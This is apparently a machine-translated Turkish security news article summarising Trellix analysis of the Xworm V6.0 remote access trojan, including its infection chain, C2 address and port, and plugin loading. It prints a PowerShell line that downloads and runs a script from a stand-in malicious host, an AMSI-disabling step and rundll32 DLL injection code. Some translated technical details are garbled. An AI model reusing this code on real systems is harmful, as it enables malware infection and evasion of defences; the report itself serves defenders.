Xworm’un 2025’in ortalarında yeniden canlanması, kötü amaçlı yazılım sofistikte önemli bir artışa işaret ediyor.
2024’ün sonlarında 5.6 sürümüne yönelik resmi desteğin aniden durdurulmasını takiben bir durgunluktan sonra, tehdit aktörleri 4 Haziran 2025’te Xworm V6.0’ı tanıttı.
Hackforums.net’teki XCoderTools adlı bir hesap tarafından bir yayın, bu sürümü ilk duyurdu ve önceki sürümlerde mevcut olan kritik bir uzaktan kod yürütme kusurunu yamaladığını iddia etti.
.webp)
Yazarın özgünlüğü hakkındaki ilk şüpheciliğe rağmen, Virustotal’a sunulan sonraki örnekler, kötü amaçlı yazılımların siber suçlular arasında hızlı bir şekilde benimsenmesini doğruladı.
Xworm’un modüler mimarisi, bir çekirdek müşteri ve kimlik bilgisi hırsızlığından fidye yazılımı dağıtımına kadar çeşitli kötü amaçlı etkinlikler sağlayan bir eklenti paketi etrafında odaklanır.
İlk damlalık yürütüldükten sonra, tespit edilmesinden kaçınmak ve tehlikeye atılan sistemlerde devam etmek için tasarlanmış çok aşamalı bir enfeksiyon zinciri kullanır.
.webp)
Trellix analistleri, saldırganın verdiği JavaScript yükleyicisinin bir enjektör DLL yükleyen bir PowerShell komut dosyası başlatmadan önce Windows Defender’ın antimalware tarama arayüzünü devre dışı bıraktığını belirtti.
Regsvcs.exe gibi meşru bir Windows sürecine kod enjekte ederek, kötü amaçlı yazılım güvenilir sistem ikili dosyalarındaki varlığını etkili bir şekilde gizler.
Sonraki iletişim, AES şifreli bir kanal ve 666666 varsayılan anahtarı kullanılarak 4411 bağlantı noktasına göre 94.159.113.64 numaralı telefondan komut ve kontrol (C2) sunucusuna doğru iyi tanımlanmış bir protokol izler.
Bağlandıktan sonra, istemci sistem parametrelerinin bir kombinasyonunu (kullanıcı adı, işletim sistemi sürümü, işlemci sayısı ve dizin boyutları) karma olarak benzersiz bir makine tanımlayıcısı oluşturur.
.webp)
Bu istemci kimliği, kayıt defterinde HKCU altında saklanır ve gelecekteki tüm eklenti depolama, şifreleme rutinleri ve C2 işlemleri için kullanılır.
Enfeksiyon mekanizması
Xworm V6’nın enfeksiyon mekanizmasına girilmesi, dikkatle düzenlenmiş bir eylem dizisini ortaya çıkarır. İlk yük, kimlik avı e -postalarına veya tehlikeye atılan web sitelerine gömülü bir JavaScript (.js) dosyası olarak gelir.
Yürütüldüğünde, bu komut dosyası aşağıdakilere benzer bir PowerShell komutu verir:-
$payload = (New-Object System.Net.WebClient).DownloadString('http://malicious.site/loader.ps1')
Invoke-Expression $payloadİndirilen PowerShell içeriği ilk çağrılar [System.Management.Automation.AmsiUtils]::ToggleAmsi(false) AMSI taramasını devre dışı bırakmak için.
Daha sonra enjektör DLL ve birincil xworm istemci yürütülebilir dosyasını yazar. %TEMP%DLL’yi başlatmadan önce:-
Process injector = new Process();
injector.StartInfo.FileName = "rundll32.exe";
injector.StartInfo.Arguments = “\"%TEMP%\\injector.dll\",#1 \"%TEMP%\\XWormClient.exe\"”;
injector.Start();Rundll32.exe’den yararlanarak, enjektör kötü amaçlı kodu regsvcs.exe’nin adres alanına eşler ve Truva atının meşru bir süreç bağlamında çalışmasını sağlar.
Bu gizli yaklaşım sadece uygulama beyaz listesini atlamakla kalmaz, aynı zamanda geçici dizinler arasında kötü niyetli bileşenleri dağıtarak adli analizi de karmaşıklaştırır.
Yük ikamet ettikten sonra, istemci Base64 kodlu DLL’ler olarak teslim edilen daha fazla talimat veya eklenti almaya çağırır.
Her eklentinin SHA-256 karması kayıt defterine karşı kontrol edilir; Yoksa, eklenti disk yazılarına olan ihtiyacını ortadan kaldırarak doğrudan belleğe getirilir ve doğrudan belleğe yüklenir.
Bu bellek yerleşik tasarım, kötü amaçlı yazılımların ayak izini önemli ölçüde azaltır ve kalıcılığı artırır, tespit ve iyileştirmeyi özellikle savunucular için zorlaştırır.
Daha fazla anında güncellemeler almak için bizi Google News, LinkedIn ve X’te takip edin– CSN’yi Google’da tercih edilen bir kaynak olarak ayarlayın.
